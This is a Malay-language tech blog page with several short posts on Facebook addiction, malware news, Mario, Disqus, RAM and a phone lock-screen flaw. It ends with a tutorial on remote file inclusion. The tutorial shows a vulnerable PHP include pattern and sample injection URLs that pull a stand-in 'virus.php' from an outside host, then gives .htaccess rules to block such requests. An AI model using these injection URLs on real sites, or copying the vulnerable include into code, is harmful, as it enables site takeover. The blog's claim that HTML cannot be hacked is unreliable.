Showing posts with label Info. Show all posts
Showing posts with label Info. Show all posts

Facebook Membawa Ketagihan


Facebook Membawa Ketagihan. Tidak dinafikan lagi Facebook sememangnya membawa ketagihan kepada penggunanya. Daripada survey yang dijalankan di London, pengguna Facebook akan menghabiskan masa terlalu lama menggunakannya sehingga mereka tidak gembira dengan kehidupan mereka sendiri

Menurut survey yang dijalankan itu, pengguna yang mula membuka komputer akan terus masuk ke laman web jaringan tersebut. Golongan yang berpendapatan dan berpendidikan rendah adalah golongan yang didapati berisiko tinggi mengalami ketagihan itu.

Sebahagian daripada responden merasakan kehidupan mereka yang dikecapi selama ini telah diambil oleh Facebook. Banyak masa yang diluangkan hanya untuk Facebook sehinggakan tiada masa untuk melakukan perkara penting yang lain.


Daripada survey yang dibuat secara rawak itu, 85 peratus daripada mereka mengakui menggunakan Facebook setiap hari dan sebahagian dari mereka akan membuka laman tersebut terlebih dahulu berbanding laman web yang lain tidak kira menggunakan komputer atau alat telekomunikasi yang lain.

Di Malaysia, ketagihan menggunakan Facebook juga dilihat sama tahapnya dengan pengguna pengguna lain di luar negara. Pengguna Facebook di Malaysia banyak menghabiskan masa di Fanpage serta Group dengan membaca status, menonton video, membalas komen serta bersembang dan mereka sanggup menghabiskan masa seharian di depan komputer.

Sumber

Facebook, firma-firma kewangan disasarkan serangan Malware


Facebook squashes Dorkbot
Ahli Facebook disasarkan oleh program merosakkan dipanggil Dorkbot. Program ini terutamanya merebak melalui Facebook chat, tetapi ia juga boleh menyebarkan peranti USB yang menyeluruh, kata Bianca Stanescu daripada BitDefender.

Dorkbot berpura-pura menjadi fail gambar tetapi sebenarnya adalah satu program yang memasang kod berniat jahat pada mesin apabila seseorang cuba untuk membuka fail tersebut. Maklumat dalam talian persalinan Mediafire menemui fail beracun di pelayan itu dan telah mengambil langkah-langkah untuk sampah mereka, termasuk mengelap fail dengan sambungan dua, seperti. Jpg.exe. Png.exe, dan. Bmp.exe.

Dorkbot mengandungi beg biasa helah malware. Ia akan mencuri maklumat sensitif dari mesin yang dijangkiti dan boleh menyekat kemas kini perisian antivirus untuk melindungi dirinya daripada diketahui.

Pulangan PushDo
Penyelidik juga dilaporkan pada minggu lepas bahawa keluarga botware lama diajar beberapa helah baru. Botware digunakan untuk menubuhkan satu rangkaian mesin yang dijangkiti yang boleh digunakan untuk pelbagai tugas jahat. PushDo adalah keluarga botware tua beruban dan, menurut Damballa Kanan Penyelidik Jeremy Demar, ia sedang diubahsuai untuk menggunakan Algoritma Generasi Domain sebagai mekanisme sandaran apabila perintah dan server kawalan terganggu.

Teknik ini membolehkan botnet menjalankan perisian untuk mewujudkan lebih daripada satu ribu nama domain palsu dan unik sehari, dan untuk menyambung kepada mereka jika arahan dan pelayan kawalan tersingkir oleh pejuang bot. Ini kedut terbaru dalam PushDo menunjukkan sekali lagi daya tahan penulis. Botnet telah ditutup empat kali dalam tempoh lima tahun yang lalu, hanya untuk bangkit semula dari mati, seperti mesin zombie dalam rangkaian. PushDo mempunyai beberapa cara lain yang diam-diam, Demar menulis.

"Malware akan menjana trafik palsu ke laman web yang sah dalam usaha untuk menutup C & C yang komunikasi, dengan 200 nama-nama domain untuk menghubungi," katanya. "C & C pelayan juga akan bertindak balas dengan imej jpeg dengan disulitkan, muatan malware tertanam untuk menyembunyikan apa-apa fail tambahan ia mahu turun." Bank of America, Citibank, dan Dun & Bradsteet bertajuk beberapa penipuan yang disasarkan untuk perniagaan minggu lalu.

Institusi-institusi kewangan yang disasarkan
Solera Networks melambai bendera merah sepanjang kempen spam menyamar sebagai "pernyataan saudagar" dari bank. The detritus digital mengandungi perkataan-pemprosesan fail-a. Doc atau. Rtf dan jika dibuka, mengeksploitasi kelemahan diperbaiki oleh Microsoft pada tahun lalu untuk memasang pencuri kata laluan pada mesin yang dijangkiti.

The Dun & Bradstreet penipuan adalah satu perubahan yang lama Better Business Bureau penipuan. Dalam kes ini, sasaran yang menerima e-mel rasmi yang berpandangan dari D & B mendakwa aduan telah dibuat terhadap mereka. Sasaran boleh melihat aduan dengan klik pada lampiran kepada e-mel. Berbuat demikian, sudah tentu, memasang Trojan pada mesin mereka yang akan mencuri maklumat peribadi daripada peranti, menurut Barracuda Networks.

Hilangkan Bosan dengan permainan mini Super Mario Di GilerHackers



"ANDA BOLEH MENCUBA PERMAINAN SUPER MARIO DIATAS"
Mario
adalah karakter fiksi pada permainan video, diciptakan oleh desainer permainan video, Shigeru Miyamoto. Menjadi maskot Nintendo, Mario telah mucul pada lebih dari 200 permainan video sejak pembuatannya. Mario kini banyak muncul dalam berbagai jenis permainan video, seperti balapan, puzzle, permainan perang, fighting, olahraga, dan lainnya.

Mario digambarkan sebagai tukang kayu juga tukang ledeng Italia yang pendek dan gemuk di Kerajaan Jamur. Pada serial Mario, ia berkali-kali menghentikan rencana Bowser menculik Princess Peach dan menaklukan Kerajaan Jamur. Ia juga memiliki teman dan musuh lain.

Sebagai maskot Nintendo, Mario adalah salah satu karakter paling terkenal dalam sejarah permainan video,[1] dan Mario menjadi sinonim dengan permainan video. Permainan Mario telah terjual lebih dari 201 juta unit, menjadikan serial Mario sebagai serial permainan video paling banyak terjual.

Konsep
Mario diciptakan oleh Shigeru Miyamoto dalam usahanya untuk membuat permainan video yang laris untuk Nintendo, setelah permainan-permainan sebelumnya, seperti Sheriff, tidak berhasil meraih sekses. Awalnya, Miyamoto ingin membuat permainan video dengan menggunakan karakter Popeye, Bluto, dan Olive Oyl. Akan tetapi, dia tidak dibenarkan menggunakan karakter-karakter tersebut, sehingga akhirnya dia membuat Jumpman (kemudian dikenal sebagai Mario), Donkey Kong, dan Pauline.


Penampilan
Shigeru Miyamoto sebagai pencipta Mario memakaikan topi pada karakter Mario kerana merasa kesulitan menggambar rambut pada saat itu. Selain itu mulut juga mengalami nasib yang sama, Shigeru lebih memilih memakaikan kumis tebal pada Mario. Mario biasanya memakai baju yang merupakan kombinasi antara kaus biru dan overall berwarna merah, tetapi pada game Super Mario Bross, kaus Mario berubah menjadi warna coklat muda.

Saudara Kandung
Mario memiliki seorang saudara kandung yang bernama Luigi. Luigi muncul pertama kali pada tahun 1983 dalam game Mario Bros. Pada awalnya Luigi selalu dianggap sebagai adik Mario yang sedikit lebih muda.


Musuh Abadi
Memang Bowser selalu tampil menjadi musuh utama Mario dalam kebanyakan game, tetapi sesungguhnya Mario memiliki musuh abadi yang memiliki nama Wario. Nama Wario itu sendiri berasal dari gabungan kata "warui" yang ertinya tidak baik dan Mario. Berbeza dengan Mario yang diciptakan oleh Shigeru Miyamoto, Wario diciptakan oleh Gunpei Yoko. Wario muncul pertama kali pada tahun 1992 dalam game Super Mario Land 2: 6 Golden Coins sebagai musuh utama sekaligus raja terakhir game tersebut. Karakter Wario memiliki beberapa fakta unik, pertama-tama tinggi badan Wario selalu berubah-ubah, kadang kadang Wario digambarkan lebih tinggi dari Mario dan terkadang sebaliknya

Aplikasi Disqus terbaik untuk pengurusan komen blog


Assalamualaiikum dan selamat sejahtera.Jika anda perhatikan pada kotak komentar. [GH] menggunakan sistem disqus.dahulu kami menggunakan facebook komen,kenapa beralih kepada sistem komentar Dari Disqus?

Walaupun ada yang tidak menyukai penggunaan sistem disqus,tetapi disqus mempunyai banyak kelebihan.selain hanya dari log masuk menggunakan akaun social seperti facebook,twitter, google+ dan sebagainya. Disqus mempunyai kelebihan yang tersendiri.

Menjimatkan masa
Ini merupakan perkara pertama yang akan diberi perhatian oleh sesiapa sahaja -- kelebihan penggunaan aplikasi Disqus. Sekiranya anda membina laman web dinamik (tidak melibatkan penggunaan CMS), penggunaan Disqus boleh menjimatkan masa untuk penghasilan sistem komen. Setiap kod fungsi untuk satu-satu komen diselesaikan oleh pihak Disqus dan bukan anda.

Multi-rangkaian dengan laman sosial
Selain itu, Disqus juga menyediakan kolaborasi dan gabungan rangkaian dengan laman-laman sosial seperti Google, Facebook dan Twitter. Setiap pengguna boleh mengesahkan identiti mereka hanya dengan satu klik pada butang pilihan. Bagi laman binaan sendiri, anda tidak perlu menyediakan fungsi pendaftaran untuk mendapatkan fungsi komen yang lebih selamat. Atau penggunaan sistem CMS juga boleh dinyahaktifkan sistem komen bagi digantikan sepenuhnya dengan Disqus.

Keselamatan terjamin
Disqus juga menyediakan sistem keselamatan berperingkat termasuklah penapisan kepada serangan injeksi SQL, XSS dan skrip-skrip berbahaya. Selain itu, cubaan mengodam laman tidak boleh dilakukan menerusi Disqus kerana kod yang anda gunakan hanyalah kod HTML yang biasa. Adalah mustahil untuk menggodam menerusi kod HTML.

Moderator berbilang
Disqus juga menyediakan fungsi moderator berbilang. Maknanya setiap komen yang dihantar boleh diuruskan oleh berbilang pengguna. Dan yang penting, ianya berpusat. Sekiranya anda menggunakan Disqus pada lebih 50 laman, semua komen ini dikawal dan diuruskan di laman web Disqus.com sendiri.

Perkongsian data-data komen
Fungsi untuk menarik maklumat komen dari laman-laman lain boleh dilakukan dengan mudah. Dengan satu kod pengesahan, anda boleh berkongsi data-data komen dari lebih dua laman web berlainan (yang menggunakan sistem berlainan) pada laman web yang lain. Berbanding secara tradisional, data-data komen hanya terhad kepada laman web tersebut sahaja kecuali proses integrasi dan API digunakan.

Data disimpan selamanya
Perkara yang paling penting -- data-data komen anda selamat selama-lamanya. Disebabkan oleh Disqus menggunakan pangkalan datanya tersendiri, seandainya laman tersebut ditamatkan perkhidmatan atau anda beralih kepada sistem yang lain, ke semua data-data komen ini boleh dikembalikan dan dipaparkan semula.

Kredit

Kenali RAM (Random Access Memory)


Assalamualaiikum dan selamat sejahtera.Kami dari GilerHackers memohon maaf kerana tiada artikel dikemas kini dalam 2-3 hari kebelakangan ini.kerana agak kesibukan masa. entri kali ini 100% dicopy paste dari blog   shahteamberkk.blogspot.com selamat membaca. ^_^

Secara ringkasnya RAM adalah Perantaraan antara Processor dan Hard Disk.Dimana Fungsi RAM Mengumpul Data yang di Proses oleh CPU sebelum di hantar atau disimpan ke dalam Hard Disk.Sebab itu la RAM yang menpunyai jumlah memory simpanan data yang besar cthnya 2gb dapat mengelakkan Windows menjadi berat,apabila kita menjalankan banyak program pada Windows dalam satu masa pada Komputer.

Jenis-jenis RAM
RAM menpunyai 6 jenis iaitu SDRAM,DDR1 RAM,DDR2 RAM, DDR3 RAM,DDR4 RAM dan yang terkini DDR5 RAM


SDRAM ialah RAM yang paling lama.Selalunya SDRAM jenis ini untuk Motherboard zaman Pentium 3
RAM jenis ini sudah tidak berada di pasaran masa kini.Jumlah tertinggi memory SDRAM ini ialah 256mb


RAM DDR 1 ini adalah RAM untuk motherboard intel Pentium 4,AMD ataupun untuk motherboard tahun 2002 ke bawah.Memory tertinggi RAM jenis ini adalah 512mb.RAM jenis ini juga susah untuk dijumpai di pasaran skrg kalau ada pun yang terpakai.


RAM DDR 2 adalah RAM untuk Motherboard tahun 2004 keatas seperti motherboad intel dual core,Amd Sempron,Athlon ataupun seangkatan dgnnya.RAM jenis murah harga kerana byk di pasaran skrg.Memory paling tinggi RAM ini ialan 2gb


RAM jenis DDR 3 adalah RAM keluaran baru untuk menyokong Keluaran Motherboad terbaru masa kini.Memory tertinggi RAM jenis ini adalah 4gb.Harganya mahal sedikit berbanding RAM DDR 2

Pengeluar RAM yang paling popular ialan KINGSTON.Setiap RAM akan diupdate untuk menyokong Motherboard yang terbaru.Setiap RAM yang terbaru menpunyai kelebihan seperti Current,jumlah Memory yang besar

Ini adalah cth RAM yang Popular di pasaran sekrg.Ada lagi RAM keluaran terbaru seperti RAM DDR 4 dan DDR 5

Cara Download Video Youtube Tanpa Software

Assalamualaiikum dan selamat sejahtera.
Artikel kali ini kami kognsikan 1 tips paling mudah untuk muat turun (download) video dari youtube tanpa memerlukan software.Sangat mudah digunakan dan sangat ringkas ^_^

Pertama, anda hanya perlu ke laman web http://en.savefrom.net/ dan masukan url Link Video yang ingin di download.contoh seperti gambar dibawah.


Tunggu beberapa saat, selepas keputusan diproses, sila rujuk kotak bewarna merah, pilih jenis fail yang anda ingin dan klick sahaja pada link berkenaan. Selesai tutorial Download Video dari youtube tanpa Software.

Selain youtube, boleh juga guna untuk download fail dari rapidshare.com

kalau malas boleh paste sahaja link youtube dibawah. :p
Masukan Url Video dibawah dan klick Download

Jika artikel ini bermanfaat, sila klick button share dibawah.selamat mencuba.

Pencetak Mini Untuk Telefon Pintar


LG Electronics (LG) memperkenalkan satu peranti terbaru dalam memudahkan penggunanya mencetak gambar secara terus selepas diambil melalui telefon pintar atau tablet.
PD233 adalah pencetak poket mini yang memberikan kualiti cetakan gambar terbaik dan pantas. Hanya perlu menyambungkan telefon pintar dengan pencetak melalui sambungan WiFi.

Pencetak poket mini ini boleh digunakan untuk pengguna telefon pintar Android dan iOS. Pencetak yang kecil ini sangat menarik dan mempunyai bentuk luaran yang stylish.

Ia menjadi pencetak terkecil dan paling ringan dengan hanya berat 215 gram dan ukuran sekitar 72 x 120 x 24 mm, membolehkan senang membawanya ke mana saja termasuk meletakkan di dalam poket baju atau dalam beg tangan.

Tidak hairanlah jika LG menyasarkan untuk golongan yang sentiasa sibuk atau kepada mereka yang melancong. Ia boleh dijadikan sebagai poskad kenangan sewaktu melancong.

Hasil cetakan dari pencetak ini akan berukuran 5.1 x 7.6 cm, saiz yang sangat praktikal untuk dikongsi atau dijadikan kenangan.
Pengguna hanya perlu muat turun aplikasi pencetak ini dan seterusnya hanya perlu menyambungkan telefon pintar dengan pencetak poket mini dan boleh terus mencetak dengan pantas.

Sumber

Bypass Samsung Galaxy Note II LOCK SCREEN Vulnerability


Assalamualaiikum dan selamat sejahtera.Jika anda seorang pengguna iOS,Mungkin anda pernah mendengar tentang kelemahan keselamatan iPhone yang ditemui baru-baru ini. Boleh rujuk disini [+]Link

Kali ini ia adalah Android yang di buzz hari ini. Khususnya, ia phablet kreatif Samsung Galaxy Note II. Seorang Youtuber bernama Terence Eden baru-baru ini telah memuat naik satu video di youtube yang menunjukkan kelemahan keselamatan pada Samsung Galaxy Note II.

Kelemahan ini menunjukkan bagaimana pengguna boleh memintas skrin kunci dan mengakses aplikasi atau panggilan dari Home Screen  Android OS. Kelemahan ini telah ditunjukkan pada Note II berjalan pada Android 4.1.2 saham OS. Walaupun, pengguna hanya boleh mengakses skrin untuk satu atau dua kali, tetapi ia adalah satu jangka masa yang cukup untuk membuat panggilan atau membuka mana-mana aplikasi pada skrin jika anda cukup cepat.



* Samsung Galaxy S3 Android 4.1.2 juga dikatakan terdedah pada masalah yang sama.

Hack Dengan Kaedah RFI [Remote File Inclusion ] Bagaimana ia berfungsi?

Assalamualaiikum dan selamat sejahtera.RFI atau Remote file inclusion sekarang menjadi salah satu kaedah yang selalu digunakan penggodam selain kaedah suntikan SQL.Jadi kami di [GH] cuba mencari info bagaimana ia berfungsi.

"Remote file inclusion" atau lebih mesra dikenali sebagai "R.F.I" adalah salah satu serangan terhadap laman web dengan membolehkan pihak penyerang menjalankan skrip atau aturcara mereka tersendiri. Kesannya bergantung kepada jenis skrip yang dimasukkan oleh pihak penyerang.

Sekiranya mereka menjalankan aturcara membuang pangkalan data, maka ke semua laman web anda tidak dapat dijalankan memandangkan pangkalan data anda sudah dibuang.

Akhirnya, anda terpaksa mengembalikan pangkalan data yang telah disalin sebelum ini bagi membolehkan laman web berjalan semula seperti biasa. Sehubungan dengan itu, anda boleh gunakan artikel ini sebagai panduan untuk menyelamatkan laman web dari digondam melalui cara ini seandainya anda menggunakan skrip laman web tersendiri. Jika menggunakan CMS, tidak perlu risau mengenainya.

Cara Serangan RFI
Kaedah serangan RFI ini sebenarnya bergantung kepada cara penulisan skrip anda di laman web yang telah dikesan oleh pihak penyerang.

Untuk melakukan penyerang perlu tahu secara lengkap skrip yang anda jalankan. Berikut adalah antara contoh aturcara laman web anda yang telah membuka ruang kepada penyerang dan semestinya dijalankan pada pelayan yang menggunakan PHP.
include($page . '.php');

Aturcara di atas dituliskan dalam satu fail .php yang bakal memproses maklumat yang dihantar contohnya satu laman web borang, selepas diklik butang "Hantar", semua maklumat yang dimasukkan oleh pengguna akan ditujukan ke laman ini. Katakan nama fail tersebut adalah index.php.

Maka selepas diklik butang "Hantar", alamat URL di pelayar web (web browser) akan bertukar menjadi seperti ini:
http://www.websaya.com/index.php?page=arkib

Di mana, bahagian aturcara di dalam index.php akan ditukarkan kepada pembolehubah yang dinyatakan dalam URL menjadi seperti ini:
include('arkib.php');

dan secara tersendirinya, fail index.php akan memanggil fail arkib.php ke dalamnya dan proses seterusnya dijalankan. Oleh kerana pembolehubah $page dalam index.php tidak dinyatakan nilaian asal (default) maka pengondam akan menggunakan pembolehubah ini untuk memasukkan nilaian dari laman web yang lain. Contohnya:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php

dan di bahagian index.php pula, pembolehubah include akan menafsirkan nilaian tersebut menjadi seperti ini:
include('http://www.weblain.com/virus.php.php');

Tetapi oleh kerana pihak pengondam tidak mengetahui secara lengkap apakah jenis sambungan yang anda akan tetapkan, jadi mereka akan meletakkan tanda "?" dibelakang alamat URL bagi membolehkan aturcara dibahagian pelayan melepaskan fail tersebut untuk diproses.

Tanda "?" membawa maksud supaya pihak pelayan (server) menentukan sendiri bentuk fail tersebut. Sekiranya sambungan yang telah ditetapkan adalah .php, maka dengan sendiri fail tersebut dilepaskan.

Sekiranya sambungan dibahagian include ditetapkan kepada .ini berbanding .php seperti include($page . '.ini'); maka "?" akan menjadikan sambungan seterusnya sebagai pembolehubah yang lain. Sebagai contoh:
include($page . '.ini');

dan "URL injection" yang dimasukkan adalah seperti ini:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php?

maka, proses yang berlaku di dalam index.php adalah:
include('http://www.weblain.com/virus.php?.ini');

pada asalnya, bagi menjalankan aturcara, pengondam seharusnya menggunakan sambungan fail .ini. Tetapi pihak pembangunan telah meletakkan sambungan .ini berbanding .php. Oleh kerana kehadiran "?", maka dibahagian pelayan (server) tetap menjalankan proses dengan memanggil fail tersebut walaupun sambungan berlainan kerana tanda "?" menjadikan sambungan .ini sebagai satu pembolehubah yang lain.

Dengan ini, fail virus.php tersebut dengan sendirinya akan dimasukkan ke dalam index.php dan dijalankan. Seterusnya akan merosakkan laman web anda mengikut aturcara yang ditulis oleh pihak pengondam.

Kenapa serangan ini boleh dijalankan
register_global dihidupkan. register_global membolehkan PHP mengambil secara pembolehubah yang dinyatakan di dalam URL tanpa melalui proses tapisan sekuriti terlebih dahulu. Oleh sebab itu, kebiasaanya untuk pelayan-pelayan web (server) yang baru, fungsi ini dimatikan secara asalnya.

allow_url_fopen
dihidupkan. Fungsi ini membenarkan PHP untuk memasukkan sebarang maklumat atau membuka ruang untuk kemasukkan fail yang lain dari domain yang asal (kiranya memasukkan fail dari tempat yang lain). Oleh sebab itu, dalam versi PHP 5.2, fungsi ini telah diubahsuai dan diasingkan yang mana untuk fungsi include(), allow_url_include telah diwujudkan dan tetapan ini telah dimatikan secara sendirinya.

Cara mengatasi serangan RFI
Terdapat beberapa cara yang boleh kita lakukan untuk mengatasi dan melindungi laman web dari terkena serangan ini tetapi di sini saya cuma tunjukkan satu cara sahaja iaitu dengan menggunakan .htaccess fail. Sebelum itu, perlu pastikan bahawa pelayan menyokong "mod_rewrite"

Dengan menggunakan arahan di bawah ini, ia akan memeriksa sebarang permintaan yang datang dari URL luaran iaitu http://, https:// dan ftp://
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)

Seterusnya dengan memasukkan kod di atas di dalam .htaccess dan diikuti dengan beberapa arahan lain seperti:
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)
RewriteRule ^(.+)$ - [F]

Seandainya anda mempunyai akses terus ke dalam pelayan untuk mengendalikan beberapa modul-modul server, anda boleh gunakan arahan ini:
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [env=rfi:true]
</IfModule>
CustomLog /path/to/logs/rfi.log combined env=rfi

Sumber Rujukan

 

© Copyright 2013 [GH] GilerHackers! All Rights Reserved.
Beo v.3 Themes Design by BukhariMalek | Contact On Facebook Diselenggara Oleh: IdeaKreatif